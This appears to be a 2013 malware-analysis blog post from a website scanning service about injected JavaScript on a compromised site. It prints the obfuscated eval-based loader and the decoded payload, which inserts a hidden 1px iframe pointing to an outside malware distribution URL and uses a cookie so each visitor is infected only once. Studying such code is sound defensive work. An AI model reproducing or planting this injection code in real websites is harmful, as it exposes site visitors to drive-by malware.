Thursday, August 8, 2013

Malware Attacking Unique Website Visitors Only

Hidden Malicious Iframes Generated By JavaScript For Unique Visitors Only

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This infected website hosts suspicious JavaScript code injected in 16 files. Malicious JavaScript code sets and checks cookies to ensure unique visitor is infected. The malicious redirect lead to domain that was used as intermediate resource to infect over 300 websites.

Similar issues were detected by online website scanner earlier and were covered in Hidden iframes serving blackhat SEO business and in Scheduled hidden iframe injection redirects to malicious website posts.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Wed Jun 19 08:11:06 2013
Infected website's files: 16 
Website malware scan report link: http://goo.gl/i1ZrIT

Quttera website malware scanner screenshot
Online Website Malware Scanner report screenshot

Threat dump:

Malicious JavaScript detected on website. Quttera report threat dump screenshot.
Malicious JavaScript detected on website. Quttera report threat dump screenshot.


Malware entry


Malware entry details.

Beautified script

  1. ps = "split";
  2. asd = function () {
  3.     d.body--
  4. };
  5. =("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,175,162,155,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,175,162,155,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,151,145,161,164,160,145,175,163,162,160,175,62,146,166,163,173,167,151,166,160,155,152,151,62,150,151,63,150,163,147,167,63,147,163,171,162,170,62,164,154,164,53,77,21,16,44,175,162,155,156,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,175,162,155,156,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,175,162,155,156,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,175,162,155,156,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,175,162,155,156,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,175,162,155,156,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,162,155,156,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,175,162,155,156,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,162,155,156,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,175,162,155,156,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));
  6. ss = String;
  7. = document;
  8. for (= 0; i < a.length; i += 1) {
  9.     a[i] = -(8 - 4) + parseInt(a[i], 8);
  10. }
  11. try {
  12.     asd()
  13. } catch (q) {
  14.     zz = 0;
  15. }
  16. try {
  17.     zz /= 2
  18. } catch (q) {
  19.     zz = 1;
  20. }
  21. if (!zz) eval(ss.fromCharCode.apply(ss, a));


Malicious payload


Decoded payload injects hidden iframe to http://teamplayonly.browserlife.de/docs/count.php


  1. function zzzfff() {
  2.     var ynij = document.createElement('iframe');
  3.     ynij.src = 'http://teamplayonly.browserlife.de/docs/count.php';
  4.     ynij.style.position = 'absolute';
  5.     ynij.style.border = '0';
  6.     ynij.style.height = '1px';
  7.     ynij.style.width = '1px';
  8.     ynij.style.left = '1px';
  9.     ynij.style.top = '1px';
  10.     if (!document.getElementById('ynij')) {
  11.         document.write('<div id=\'ynij\'></div>');
  12.         document.getElementById('ynij').appendChild(ynij);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled) {
  37.     if (GetCookie('visited_uq') == 55) {} else {
  38.         SetCookie('visited_uq', '55', '1', '/');
  39.         zzzfff();
  40.     }
  41. }

Blacklisting status


Google Safe Browsing analysis of the redirect URL.
http://www.google.com/safebrowsing/diagnostic?site=teamplayonly.browserlife.de

Per Google:
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, teamplayonly.browserlife.de appeared to function as an intermediary for the infection of 6 site(s) including ikwilgoedkoop.nl/,malermeister-kiper.de/, fortytwierdzyprzemysl.pl/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 308 domain(s), including lerbc.fr/fortytwierdzyprzemysl.pl/pyjama-royal.com/.

Currently, as this post being created bith Kaspersky and BitDefender detect it as Malicious:
Virustotal report



Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.